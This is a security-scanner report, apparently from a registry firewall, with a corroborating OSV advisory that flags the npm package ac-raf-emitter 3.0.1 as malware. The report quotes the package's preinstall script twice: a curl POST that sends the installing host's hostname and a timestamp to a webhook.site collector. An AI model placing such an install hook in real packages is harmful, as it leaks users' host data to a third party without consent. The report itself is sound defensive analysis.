registry  /  ac-raf-emitter  /  3.0.1

ac-raf-emitter@3.0.1

Softwaer supply chain attack vector

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Installing the package automatically sends host-identifying metadata to a third-party webhook. No source files besides the manifest are present.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install, before package installation completes
Impact
Unconsented disclosure of installation-host metadata to a third party.
Mechanism
preinstall curl POST exfiltrates hostname and timestamp
Attack narrative
`package.json` executes a `preinstall` command automatically when npm installs this package. The command POSTs to a third-party webhook URL and includes `$(hostname)` plus the current timestamp as a query parameter, creating unconsented install-host telemetry. The manifest is the only package file and its declared runtime entrypoint does not exist, so the package provides no apparent legitimate implementation that would justify the lifecycle network call.
Rationale
Direct inspection confirms concrete install-time network exfiltration of host metadata, with no package source implementation present. This is malicious supply-chain behavior.
Evidence
package.json
Network endpoints1
webhook.site/54919426-084d-4288-8f80-e36ae5c76e32

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10675
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in ac-raf-emitter (npm)
Details
package.json declares a preinstall lifecycle script that runs `curl -X POST` against a hardcoded webhook.site collector URL (https://webhook.site/54919426-084d-4288-8f80-e36ae5c76e32), passing the installer's hostname and a timestamp as query parameters. The exfiltration fires automatically on `npm install` before any consumer code runs. The destination is an anonymous, author-controlled request-inspection endpoint with no legitimate role in the package's advertised functionality.

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` defines a `preinstall` lifecycle hook.
  • The hook runs `curl -X POST` to `webhook.site` during installation.
  • It embeds the installing host's hostname and a timestamp in the request URL.
  • The package description explicitly says “Softwaer supply chain attack vector”.
  • Declared `index.js` entrypoint is absent; package contains only `package.json`.
Evidence against
    Behavioral surface
    SourceNo risky source behavior triggered.
    Supply chainNo supply-chain packaging signals triggered.
    Manifest
    NoLicense
    scanned 0 file(s), 0 B of source

    Source & flagged code

    2 flagged · loading source
    package.jsonView file
    scripts.preinstall = curl -X POST "https://webhook.site/54919426-084d-4288-8f80-e36ae5c76e32?id=$(hostname)-$(date +%s)"
    High
    Install Time Lifecycle Scripts

    Package defines install-time lifecycle scripts.

    package.jsonView on unpkg
    scripts.preinstall = curl -X POST "https://webhook.site/54919426-084d-4288-8f80-e36ae5c76e32?id=$(hostname)-$(date +%s)"
    Medium
    Ambiguous Install Lifecycle Script

    Install-time lifecycle script is not statically allowlisted and needs review.

    package.jsonView on unpkg

    Findings

    1 High1 Medium2 Low
    HighInstall Time Lifecycle Scriptspackage.json
    MediumAmbiguous Install Lifecycle Scriptpackage.json
    LowScripts Present
    LowNo License